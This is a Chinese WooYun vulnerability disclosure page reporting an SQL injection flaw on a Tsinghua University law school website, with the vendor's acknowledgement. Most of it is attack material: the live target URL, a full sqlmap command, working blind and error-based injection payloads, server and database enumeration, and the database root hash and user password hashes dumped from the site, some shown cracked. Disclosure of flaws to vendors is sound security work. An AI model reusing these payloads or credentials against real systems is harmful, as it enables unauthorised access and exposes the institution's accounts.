清华大学法学院某站存在SQL注射漏洞（DBA权限+root密码+用户密码）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157253

漏洞标题：清华大学法学院某站存在SQL注射漏洞（DBA权限+root密码+用户密码）

漏洞作者：路人甲

提交时间：2015-12-01 10:24

修复时间：2016-01-15 15:14

公开时间：2016-01-15 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-01：细节已通知厂商并且等待厂商处理中
2015-12-01：厂商已经确认，细节仅向厂商公开
2015-12-11：细节向核心白帽子及相关领域专家公开
2015-12-21：细节向普通白帽子公开
2015-12-31：细节向实习白帽子公开
2016-01-15：细节向公众公开

简要描述：

详细说明：

地址：http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ

$ python sqlmap.py -u "http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ" -p keyword --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass

current user:    'root@localhost'
current user is DBA:    True
database management system users [2]:
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *82ABFA4A96C08F6E5CAA1784CC0698E6049EC9FD

Database: qinghua
Table: user
[8 entries]
+-------------------------------------------+
| password                                  |
+-------------------------------------------+
| 0b3efc6f804c4dd320748c6578b0a354          |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 2f12ad13e7a6a2710549efb5f4b86a5b          |
| 9a40453cf2388c08223b95600237eb39          |
+-------------------------------------------+

漏洞证明：

---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: r=search/index&keyword=-5786" OR 6891=6891#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: r=search/index&keyword=-8809" OR 1 GROUP BY CONCAT(0x7170786a71,(SELECT (CASE WHEN (3197=3197) THEN 1 ELSE 0 END)),0x717a707671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.0
back-end DBMS: MySQL >= 5.0.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [2]:
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *82ABFA4A96C08F6E5CAA1784CC0698E6049EC9FD
Database: qinghua
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| notice                                | 3114    |
| notice1                               | 1027    |
| photo                                 | 184     |
| tree                                  | 163     |
| link                                  | 111     |
| acategory                             | 23      |
| video_info                            | 10      |
| `user`                                | 8       |
| authassignment                        | 8       |
| website                               | 6       |
| authitem                              | 4       |
| authitemchild                         | 3       |
| tuijian                               | 1       |
| visit                                 | 1       |
+---------------------------------------+---------+
Database: law
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bak_components                        | 32      |
| bak_plugins                           | 32      |
| jos_components                        | 32      |
| jos_plugins                           | 32      |
| bak_modules                           | 15      |
| jos_modules                           | 15      |
| bak_core_acl_aro_groups               | 11      |
| jos_core_acl_aro_groups               | 11      |
| bak_groups                            | 3       |
| jos_groups                            | 3       |
| bak_templates_menu                    | 2       |
| jos_templates_menu                    | 2       |
| bak_core_acl_aro_sections             | 1       |
| bak_menu                              | 1       |
| bak_menu_types                        | 1       |
| bak_modules_menu                      | 1       |
| jos_core_acl_aro                      | 1       |
| jos_core_acl_aro_sections             | 1       |
| jos_core_acl_groups_aro_map           | 1       |
| jos_menu                              | 1       |
| jos_menu_types                        | 1       |
| jos_modules_menu                      | 1       |
| jos_session                           | 1       |
| jos_users                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1918    |
| STATISTICS                            | 418     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 275     |
| SESSION_VARIABLES                     | 275     |
| KEY_COLUMN_USAGE                      | 239     |
| PARTITIONS                            | 213     |
| TABLES                                | 213     |
| TABLE_CONSTRAINTS                     | 184     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| USER_PRIVILEGES                       | 52      |
| CHARACTER_SETS                        | 36      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| SCHEMATA                              | 6       |
| PROCESSLIST                           | 1       |
+---------------------------------------+---------+
Database: tsinghualawnet
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| jos_vvcounter_logs                    | 67791   |
| notice                                | 1882    |
| jos_content                           | 1793    |
| notice1                               | 1027    |
| jos_messages                          | 197     |
| photo                                 | 183     |
| jos_modules_menu                      | 157     |
| tree                                  | 150     |
| jos_categories                        | 121     |
| jos_weblinks                          | 109     |
| link                                  | 109     |
| jos_content_frontpage                 | 101     |
| jos_phocagallery                      | 97      |
| jos_modules                           | 75      |
| jos_menu                              | 71      |
| jos_components                        | 60      |
| jos_jce_plugins                       | 58      |
| jos_jp_registry                       | 52      |
| jos_plugins                           | 49      |
| jos_jp_stats                          | 21      |
| jos_sections                          | 17      |
| jos_attachments                       | 16      |
| jos_core_acl_aro_groups               | 11      |
| jos_gk2_tabs_manager_tabs             | 10      |
| `user`                                | 9       |
| authassignment                        | 9       |
| jos_gk3_tabs_manager_options          | 8       |
| jos_gk3_tabs_manager_tabs             | 7       |
| jos_menu_types                        | 6       |
| website                               | 6       |
| authitem                              | 4       |
| jos_gk2_tabs_manager_groups           | 4       |
| jos_phocagallery_categories           | 4       |
| jos_templates_menu                    | 4       |
| authitemchild                         | 3       |
| jos_core_acl_aro                      | 3       |
| jos_core_acl_groups_aro_map           | 3       |
| jos_gk2_tabs_manager_plugins          | 3       |
| jos_groups                            | 3       |
| jos_jp_temp                           | 3       |
| jos_users                             | 3       |
| jos_gk3_tabs_manager_groups           | 2       |
| jos_jce_groups                        | 2       |
| jos_contact_details                   | 1       |
| jos_core_acl_aro_sections             | 1       |
| jos_gk2_tabs_manager_extensions       | 1       |
| jos_jce_extensions                    | 1       |
| jos_jp_profiles                       | 1       |
| jos_session                           | 1       |
| tuijian                               | 1       |
| video_info                            | 1       |
| visit                                 | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 990     |
| help_topic                            | 504     |
| help_keyword                          | 450     |
| help_category                         | 37      |
| `user`                                | 2       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: qinghua
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: law
Table: jos_users
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: law
Table: bak_users
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: tsinghualawnet
Table: jos_users
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: tsinghualawnet
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: qinghua
Table: user
[8 entries]
+-------------------------------------------+
| password                                  |
+-------------------------------------------+
| 0b3efc6f804c4dd320748c6578b0a354          |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 2f12ad13e7a6a2710549efb5f4b86a5b          |
| 9a40453cf2388c08223b95600237eb39          |
+-------------------------------------------+
Database: law
Table: jos_users
[1 entry]
+-------------------------------------------------------------------+
| password                                                          |
+-------------------------------------------------------------------+
| c46fb4d6e09199b3080fefdcb2a8c7d0:dqDvyIrUUdXS63FacOE6VplWYApomFBH |
+-------------------------------------------------------------------+
Database: law
Table: bak_users
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: tsinghualawnet
Table: jos_users
[3 entries]
+-------------------------------------------------------------------+
| password                                                          |
+-------------------------------------------------------------------+
| 3a8fab40189cf704a6bce6faf46ae6f9:Vlr3X2dd8kAggWObKg9pIDN4nZFqrmH5 |
| 48ca3a5a83cb18e410d6c2e5df4cb9f3:t1FGEFWhdeY5LDowjINOQyt4HAKdtm2a |
| 70284aa610116448312e6ac2752c7b98:8kdlDUDrDSxx6pJwTtXtd76yqKjEAL2m |
+-------------------------------------------------------------------+
Database: tsinghualawnet
Table: user
[9 entries]
+-------------------------------------------+
| password                                  |
+-------------------------------------------+
| 0b3efc6f804c4dd320748c6578b0a354          |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21232f297a57a5a743894a0e4a801fc3 (admin)  |
| 2f12ad13e7a6a2710549efb5f4b86a5b          |
+-------------------------------------------+
Database: mysql
Table: user
[2 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *82ABFA4A96C08F6E5CAA1784CC0698E6049EC9FD |
| *82ABFA4A96C08F6E5CAA1784CC0698E6049EC9FD |
+-------------------------------------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-12-01 15:13

厂商回复：

谢谢提醒，我们会尽快处理的。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157253

漏洞标题：清华大学法学院某站存在SQL注射漏洞（DBA权限+root密码+用户密码）

相关厂商：清华大学

漏洞作者：路人甲

提交时间：2015-12-01 10:24

修复时间：2016-01-15 15:14

公开时间：2016-01-15 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157253

漏洞标题：清华大学法学院某站存在SQL注射漏洞（DBA权限+root密码+用户密码）

相关厂商：清华大学

漏洞作者： 路人甲

提交时间：2015-12-01 10:24

修复时间：2016-01-15 15:14

公开时间：2016-01-15 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157253"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云